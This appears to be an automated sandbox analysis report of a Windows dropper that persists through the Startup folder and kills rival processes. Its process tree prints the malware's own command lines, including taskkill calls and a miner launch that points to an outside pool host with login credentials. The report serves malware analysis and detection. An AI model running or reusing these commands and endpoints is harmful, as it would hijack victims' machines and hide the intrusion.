47970273eefc3121742df7535363b7f67898d6a2633b04c2b534e20278ac840a

Analysis

max time kernel
122s
max time network
127s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
29/09/2024, 13:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe
Size

388KB
MD5

fe9d34a3640baa4564147b746b74eacc
SHA1

d4474ee31c77d6764c282a0bdfe4603c5c85a076
SHA256

47970273eefc3121742df7535363b7f67898d6a2633b04c2b534e20278ac840a
SHA512

47eafe81e5ba9c073d12d6de8706ba4ec82eac0c02c19c3fd0554bdca51d9ea702e66775d9786e2fd20a0182f14853e420cb512e8d7dce8eec27467202efcb98
SSDEEP

12288:6utrzh9xOXkFK1F9PVjIqYivDNkNwWO5RFg:6utr5OUFeBTvDyiWO5Ru

Score

7^/10

discovery

Malware Config

Signatures

Drops startup file 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\stepx2.exe	fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\__tmp_rar_sfx_access_check_259474200	fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\stepx2.exe	fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe

Executes dropped EXE 3 IoCs

pid	Process
2744	stepx2.exe
2712	hid.exe
2004	x30811.exe

Loads dropped DLL 4 IoCs

pid	Process
3028	fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe
2744	stepx2.exe
2748	cmd.exe
2748	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	stepx2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	x30811.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hid.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2700	PING.EXE

Kills process with taskkill 4 IoCs

evasion

pid	Process
2488	taskkill.exe
436	taskkill.exe
2512	taskkill.exe
2184	taskkill.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2700	PING.EXE

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2512	taskkill.exe
Token: SeDebugPrivilege	2184	taskkill.exe
Token: SeDebugPrivilege	2488	taskkill.exe
Token: SeDebugPrivilege	436	taskkill.exe

Suspicious use of WriteProcessMemory 63 IoCs

description	pid	Process	procid_target
PID 3028 wrote to memory of 2744	3028	fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe	30
PID 3028 wrote to memory of 2744	3028	fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe	30
PID 3028 wrote to memory of 2744	3028	fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe	30
PID 3028 wrote to memory of 2744	3028	fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe	30
PID 3028 wrote to memory of 2744	3028	fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe	30
PID 3028 wrote to memory of 2744	3028	fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe	30
PID 3028 wrote to memory of 2744	3028	fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe	30
PID 2744 wrote to memory of 2712	2744	stepx2.exe	31
PID 2744 wrote to memory of 2712	2744	stepx2.exe	31
PID 2744 wrote to memory of 2712	2744	stepx2.exe	31
PID 2744 wrote to memory of 2712	2744	stepx2.exe	31
PID 2744 wrote to memory of 2712	2744	stepx2.exe	31
PID 2744 wrote to memory of 2712	2744	stepx2.exe	31
PID 2744 wrote to memory of 2712	2744	stepx2.exe	31
PID 2712 wrote to memory of 2748	2712	hid.exe	32
PID 2712 wrote to memory of 2748	2712	hid.exe	32
PID 2712 wrote to memory of 2748	2712	hid.exe	32
PID 2712 wrote to memory of 2748	2712	hid.exe	32
PID 2712 wrote to memory of 2748	2712	hid.exe	32
PID 2712 wrote to memory of 2748	2712	hid.exe	32
PID 2712 wrote to memory of 2748	2712	hid.exe	32
PID 2748 wrote to memory of 2700	2748	cmd.exe	34
PID 2748 wrote to memory of 2700	2748	cmd.exe	34
PID 2748 wrote to memory of 2700	2748	cmd.exe	34
PID 2748 wrote to memory of 2700	2748	cmd.exe	34
PID 2748 wrote to memory of 2700	2748	cmd.exe	34
PID 2748 wrote to memory of 2700	2748	cmd.exe	34
PID 2748 wrote to memory of 2700	2748	cmd.exe	34
PID 2748 wrote to memory of 2512	2748	cmd.exe	35
PID 2748 wrote to memory of 2512	2748	cmd.exe	35
PID 2748 wrote to memory of 2512	2748	cmd.exe	35
PID 2748 wrote to memory of 2512	2748	cmd.exe	35
PID 2748 wrote to memory of 2512	2748	cmd.exe	35
PID 2748 wrote to memory of 2512	2748	cmd.exe	35
PID 2748 wrote to memory of 2512	2748	cmd.exe	35
PID 2748 wrote to memory of 2184	2748	cmd.exe	37
PID 2748 wrote to memory of 2184	2748	cmd.exe	37
PID 2748 wrote to memory of 2184	2748	cmd.exe	37
PID 2748 wrote to memory of 2184	2748	cmd.exe	37
PID 2748 wrote to memory of 2184	2748	cmd.exe	37
PID 2748 wrote to memory of 2184	2748	cmd.exe	37
PID 2748 wrote to memory of 2184	2748	cmd.exe	37
PID 2748 wrote to memory of 2488	2748	cmd.exe	38
PID 2748 wrote to memory of 2488	2748	cmd.exe	38
PID 2748 wrote to memory of 2488	2748	cmd.exe	38
PID 2748 wrote to memory of 2488	2748	cmd.exe	38
PID 2748 wrote to memory of 2488	2748	cmd.exe	38
PID 2748 wrote to memory of 2488	2748	cmd.exe	38
PID 2748 wrote to memory of 2488	2748	cmd.exe	38
PID 2748 wrote to memory of 436	2748	cmd.exe	39
PID 2748 wrote to memory of 436	2748	cmd.exe	39
PID 2748 wrote to memory of 436	2748	cmd.exe	39
PID 2748 wrote to memory of 436	2748	cmd.exe	39
PID 2748 wrote to memory of 436	2748	cmd.exe	39
PID 2748 wrote to memory of 436	2748	cmd.exe	39
PID 2748 wrote to memory of 436	2748	cmd.exe	39
PID 2748 wrote to memory of 2004	2748	cmd.exe	40
PID 2748 wrote to memory of 2004	2748	cmd.exe	40
PID 2748 wrote to memory of 2004	2748	cmd.exe	40
PID 2748 wrote to memory of 2004	2748	cmd.exe	40
PID 2748 wrote to memory of 2004	2748	cmd.exe	40
PID 2748 wrote to memory of 2004	2748	cmd.exe	40
PID 2748 wrote to memory of 2004	2748	cmd.exe	40

C:\Users\Admin\AppData\Local\Temp\fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe"
1⤵
- Drops startup file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3028
- C:\Users\Admin\Start Menu\Programs\Startup\stepx2.exe
  "C:\Users\Admin\Start Menu\Programs\Startup\stepx2.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2744
- - C:\Users\Admin\AppData\Local\Temp\hid.exe
    "C:\Users\Admin\AppData\Local\Temp\hid.exe" /NOCONSOLE yz.bat
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2712
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c yz.bat
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2748
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 2 127.0.0.1
        5⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2700
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im svchoost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2512
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im mamita.exe
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2184
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im x11811.exe
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2488
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Winlogon2.exe
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:436
    - - C:\Users\Admin\AppData\Local\Temp\x30811.exe
        
        x30811.exe -a 60 -g yes -o http://sfx.dload.asia:8332/ -u redem_g -p x1x2x3x4x5 -t 2
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2004

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\yz.bat

Filesize
222B

MD5
0f876659eb0993516447fab200891274

SHA1
d5f1bc306a214a9b5eeea52e7591d6e517354388

SHA256
0546b520a146326f206ece905772d8b1244497ddd9659266aff16e68aed8c007

SHA512
12d1f829f4538871169a2438817c428521009c1836d07b9c1e9f973598908ba5ef1d2faf29c840a17d2c986f08a1f78adcdd70b57cde72793a1abab55934d9d9

Download Submit
\Users\Admin\AppData\Local\Temp\hid.exe

Filesize
43KB

MD5
3286462b2bc957ff6cada40a2d017745

SHA1
08346b5b0dee4a29e70f8a138963319343e8ad47

SHA256
f95cd8d865244cecbea788b6512fb0c0e55a679348f3759d955406f49e5863bc

SHA512
e1d069951cb13bf91e0da17a4f751a248b53d31f49b72cbd8c2bd1085778fbeae1e41518b90fd6e819e946a7bee23ca669579a330a07b524ef05c3501bd508e2

Download Submit
\Users\Admin\AppData\Local\Temp\x30811.exe

Filesize
988KB

MD5
80adb053ec8e370d72bcb7d22bc43a49

SHA1
8c8231cab08d034eae9d0a4653b72afb332ca0ba

SHA256
0d2b53402d5e65491678e6a7f7b0fc567d9f1d29531ee3a03f3d85c9d972ed48

SHA512
703ae0f9025be4b39664a0f8e4b697d04ba1d4e02a95dc858b3f0276cdd1f0802a478a73636824ede11ecfab1c717ab5e25a755f945a11ef0af7a93a3fef12a3

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\stepx2.exe

Filesize
340KB

MD5
9047319b255a3d0a74addaa246375c05

SHA1
9314aa2522e9a4a1100ffcd54b1d457872f2fb8d

SHA256
b6ce3088e0f6d71e60188628f678b4665f25d5282c913415fe0fbd3f5dbea37f

SHA512
73154dd4c3779014e5e2ea1f531fb311045bdebf29fa5eb32727b321add002b8429e0b80262a1dbea3619fb7765d187e3160d1aafdd6b4009db84f92c560b85d

Download Submit
memory/2004-26-0x0000000000400000-0x00000000004FC000-memory.dmp

Filesize
1008KB

Download
memory/3028-0-0x0000000000400000-0x0000000000436000-memory.dmp

Filesize
216KB

Download
memory/3028-8-0x0000000000400000-0x0000000000436000-memory.dmp

Filesize
216KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads